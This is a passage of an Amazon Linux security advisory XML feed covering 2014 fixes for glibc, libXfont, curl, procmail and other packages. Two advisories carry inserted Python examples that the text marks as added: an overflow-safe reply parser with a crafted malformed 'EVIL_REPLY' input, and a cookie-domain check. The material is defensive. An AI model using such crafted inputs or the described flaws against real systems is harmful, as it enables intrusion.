</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587" title="" id="CVE-2014-3587" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-devel" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.19" release="4.19.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-4.19.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="4.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-5.19-4.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-399</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-399: important priority package update for glibc</title><issued date="2014-09-03 14:44:00" /><updated date="2014-09-19 11:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5119:
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
1119128:
CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119" title="" id="CVE-2014-5119" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.85.amzn1" epoch="0" 
arch="i686"><filename>Packages/glibc-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.85.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-400</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-400: medium priority package update for glibc</title><issued date="2014-09-17 21:41:00" /><updated date="2014-09-19 11:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0475:
A directory traversal flaw was found in the way glibc loaded locale files. An attacker able to make an application use a specially crafted locale name value (for example, specified in an LC_* environment variable) could possibly use this flaw to execute arbitrary code with the privileges of that application.
1102353:
CVE-2014-0475 glibc: directory traversal in LC_* locale handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475" title="" id="CVE-2014-0475" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.86.amzn1" epoch="0" 
arch="i686"><filename>Packages/glibc-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.86.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-401</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-401: low priority package update for automake19</title><issued date="2014-09-17 21:41:00" /><updated date="2014-09-19 12:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3386:
The "make distcheck" rule in GNU Automake before 1.11.6 and 1.12.x before 1.12.2 grants world-writable permissions to the extraction directory, which introduces a race condition that allows local users to execute arbitrary code via unspecified vectors.
It was found that the distcheck rule in Automake-generated Makefiles made a directory world-writable when preparing source archives. If a malicious, local user could access this directory, they could execute arbitrary code with the privileges of the user running "make distcheck".
838286:
CVE-2012-3386 automake: locally exploitable "make distcheck" bug
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3386" title="" id="CVE-2012-3386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="automake19" version="1.9.6" release="3.12.amzn1" epoch="0" arch="noarch"><filename>Packages/automake19-1.9.6-3.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-402</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-402: medium priority package update for lua</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5461:
Buffer overflow in the vararg functions in ldo.c in Lua 5.1 through 5.2.x before 5.2.3 allows context-dependent attackers to cause a denial of service (crash) via a small number of arguments to a function with a large number of fixed arguments.
1132304:
CVE-2014-5461 lua: overflow flaw in vararg functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5461" title="" id="CVE-2014-5461" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lua-devel" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-devel-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua-debuginfo" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-debuginfo-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua-static" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-static-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-devel" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-devel-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-debuginfo" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-debuginfo-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-static" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-static-5.1.4-4.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-403</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-403: medium priority package update for libXext</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1982:
Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the (1) XcupGetReservedColormapEntries, (2) XcupStoreColors, (3) XdbeGetVisualInfo, (4) XeviGetVisualInfo, (5) XShapeGetRectangles, and (6) XSyncListSystemCounters functions.
959046:
CVE-2013-1982 libXext: Multiple integer overflows leading to heap-based buffer-overflows
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1982" title="" id="CVE-2013-1982" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXext-debuginfo" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-debuginfo-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext-devel" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-devel-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext-debuginfo" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-debuginfo-1.3.1-2.9.amzn1.i686.rpm</filename></package><package name="libXext-devel" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-devel-1.3.1-2.9.amzn1.i686.rpm</filename></package><package name="libXext" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-1.3.1-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-404</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-404: medium priority package update for libXfont</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0211:
Multiple integer overflows in the (1) fs_get_reply, (2) fs_alloc_glyphs, and (3) fs_read_extent_info functions in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 allow remote font servers to execute arbitrary code via a crafted xfs reply, which triggers a buffer overflow.
1096601:
CVE-2014-0211 libXfont: integer overflows calculating memory needs for xfs replies
CVE-2014-0210:
Multiple buffer overflows in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 allow remote font servers to execute arbitrary code via a crafted xfs protocol reply to the (1) _fs_recv_conn_setup, (2) fs_read_open_font, (3) fs_read_query_info, (4) fs_read_extent_info, (5) fs_read_glyphs, (6) fs_read_list, or (7) fs_read_list_info function.
1096597:
CVE-2014-0210 libXfont: unvalidated length fields when parsing xfs protocol replies
CVE-2014-0209:
Multiple integer overflows in the (1) FontFileAddEntry and (2) lexAlias functions in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 might allow local users to gain privileges by adding a directory with a large fonts.dir or fonts.alias file to the font path, which triggers a heap-based buffer overflow, related to metadata.
1096593:
CVE-2014-0209 libXfont: integer overflow of allocations in font metadata file parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0209" title="" id="CVE-2014-0209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0210" title="" id="CVE-2014-0210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0211" title="" id="CVE-2014-0211" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-3.9.amzn1.i686.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-3.9.amzn1.i686.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-3.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-405</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-405: medium priority package update for libxcb</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2064:
Integer overflow in X.org libxcb 1.9 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the read_packet function.
960367:
CVE-2013-2064 libxcb: Integer overflow leading to heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2064" title="" id="CVE-2013-2064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxcb" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-devel" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-devel-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-doc" version="1.8.1" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/libxcb-doc-1.8.1-1.15.amzn1.noarch.rpm</filename></package><package name="libxcb-debuginfo" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-debuginfo-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-python" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-python-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-debuginfo" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-debuginfo-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb-devel" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-devel-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb-python" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-python-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-1.8.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-406</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-406: medium priority package update for 
libXtst</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2063:
Integer overflow in X.org libXtst 1.2.1 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the XRecordGetContext function.
960366:
CVE-2013-2063 libXtst: Integer overflow leading to heap-based buffer overflow
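The four X.Org advisories above (ALAS-2014-403 libXext, ALAS-2014-404 libXfont, ALAS-2014-405 libxcb, ALAS-2014-406 libXtst) share one bug class: a count read from a reply sent by the X server or font server is multiplied by a record size to compute an allocation, the product wraps, the allocator hands back a buffer far smaller than the data that follows, and the copy loop overruns it. The Python below is an added illustration and not code from any of those libraries or from Amazon. It models a hypothetical count-prefixed reply format (a 32-bit little-endian count followed by 8-byte records), shows the wrapped 32-bit product, and performs the two checks such a parser needs: bound the count before multiplying, and compare the bytes the count claims against the bytes the peer actually sent.

```python
# Added example: overflow-safe parsing of a count-prefixed protocol reply.
# The wire format is hypothetical (not xfs or X11): u32 little-endian count,
# then `count` records of two u32 fields each.

RECORD_SIZE = 8
U32_MAX = 0xFFFFFFFF


def needed_bytes_unchecked(count):
    """Model of `count * sizeof(record)` in 32-bit unsigned arithmetic.

    The product silently wraps, so a huge count can yield a tiny size; an
    allocator given that size returns a buffer far smaller than the copy
    loop will write into.
    """
    return (count * RECORD_SIZE) % (U32_MAX + 1)


def needed_bytes_checked(count):
    """Same computation with the overflow excluded before multiplying."""
    if count > U32_MAX // RECORD_SIZE:
        raise ValueError("record count %d would overflow a 32-bit size" % count)
    return count * RECORD_SIZE


def parse_reply(data):
    """Parse the reply, refusing both a wrapping size and a count that claims
    more records than the peer actually sent."""
    if 4 > len(data):
        raise ValueError("reply shorter than its header")
    count = int.from_bytes(data[0:4], "little")
    needed = needed_bytes_checked(count)          # raises on overflow
    available = len(data) - 4
    if needed > available:                         # unvalidated-length check
        raise ValueError("count %d needs %d bytes, only %d received"
                         % (count, needed, available))
    records = []
    for i in range(count):
        off = 4 + i * RECORD_SIZE
        rid = int.from_bytes(data[off:off + 4], "little")
        val = int.from_bytes(data[off + 4:off + 8], "little")
        records.append((rid, val))
    return records


def build_reply(count, records):
    """Constructed test input: encode an arbitrary count, honest or not."""
    out = count.to_bytes(4, "little")
    for rid, val in records:
        out += rid.to_bytes(4, "little") + val.to_bytes(4, "little")
    return out


# Constructed samples: an honest reply, and one whose count was chosen so
# that count * 8 wraps to 8 in 32-bit arithmetic.
GOOD_REPLY = build_reply(2, [(1, 100), (2, 200)])
EVIL_COUNT = 0x20000001
EVIL_REPLY = build_reply(EVIL_COUNT, [(0xDEAD, 0xBEEF)])


def demo():
    """Return the size an unchecked 32-bit computation would allocate for the
    evil reply, and whether the checked parser rejects that reply."""
    wrapped = needed_bytes_unchecked(EVIL_COUNT)
    try:
        parse_reply(EVIL_REPLY)
        rejected = False
    except ValueError:
        rejected = True
    return wrapped, rejected


if __name__ == "__main__":
    print(parse_reply(GOOD_REPLY))
    print(demo())
```

The order of the two checks matters: the length comparison is only meaningful once the multiplication is known not to have wrapped, which is why needed_bytes_checked runs first.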
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2063" title="" id="CVE-2013-2063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXtst" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-debuginfo" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-debuginfo-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-devel" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-devel-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-debuginfo" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-debuginfo-1.2.1-2.8.amzn1.i686.rpm</filename></package><package name="libXtst" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-1.2.1-2.8.amzn1.i686.rpm</filename></package><package name="libXtst-devel" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-devel-1.2.1-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-407</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-407: medium priority package update for curl</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3620:
1138846:
CVE-2014-3620 curl: cookies accepted for TLDs
CVE-2014-3613:
1136154:
CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain
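Both curl fixes in ALAS-2014-407 concern the test that decides whether the Domain attribute of a Set-Cookie header may be honoured for the host that sent it: a Domain that is a bare public suffix such as com would make the cookie visible to every site under that TLD, and an IP-literal host must only accept a cookie scoped to exactly that literal, never to a suffix of it. The Python below is an added example, not curl's code; it implements an RFC 6265 style domain-match with both rules. The public-suffix set it embeds is a constructed three-entry stand-in; real code needs the full Public Suffix List.

```python
# Added example: cookie Domain attribute acceptance check (not curl's code).
import ipaddress

# Constructed stand-in for the Public Suffix List; real code needs the
# full list (https://publicsuffix.org/), which also covers entries like co.uk.
PUBLIC_SUFFIXES = {"com", "example", "co.uk"}


def _is_ip_literal(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def cookie_domain_accepted(request_host, cookie_domain):
    """Return True if a cookie carrying Domain=cookie_domain may be stored
    for a response received from request_host.

    Rules applied, in order:
      1. normalise case and strip the leading dot some servers send;
      2. an IP-literal host only matches a Domain equal to that literal,
         and an IP-literal Domain never matches a hostname;
      3. a Domain that is a public suffix (TLD or registry suffix) is refused,
         because it would scope the cookie to every site under it;
      4. otherwise RFC 6265 domain-match: host equals the domain or ends
         with '.' + domain.
    """
    host = request_host.strip().lower().rstrip(".")
    domain = cookie_domain.strip().lower().lstrip(".").rstrip(".")
    if not host or not domain:
        return False
    if _is_ip_literal(host) or _is_ip_literal(domain):
        return host == domain
    if domain in PUBLIC_SUFFIXES:
        return False
    return host == domain or host.endswith("." + domain)


def filter_cookies(request_host, set_cookie_domains):
    """Return the subset of Domain attributes that would be accepted."""
    return [d for d in set_cookie_domains
            if cookie_domain_accepted(request_host, d)]


if __name__ == "__main__":
    # Constructed inputs: one accepted, one TLD-wide, one IP suffix trick.
    print(filter_cookies("www.shop.example", ["shop.example", ".com"]))
    print(cookie_domain_accepted("192.0.2.10", "0.2.10"))
```

Note the deliberate ordering: the IP-literal test runs before the suffix test, so a host like 192.0.2.10 can never be domain-matched by string-suffix logic at all.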
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3613" title="" id="CVE-2014-3613" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3620" title="" id="CVE-2014-3620" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="curl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.38.0-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-408</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-408: important priority package update for procmail</title><issued date="2014-09-17 21:46:00" /><updated 
date="2014-09-19 12:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3618:
A heap-based buffer overflow flaw was found in procmail's formail utility. A remote attacker could send an email with specially crafted headers that, when processed by formail, could cause procmail to crash or, possibly, execute arbitrary code as the user running formail.
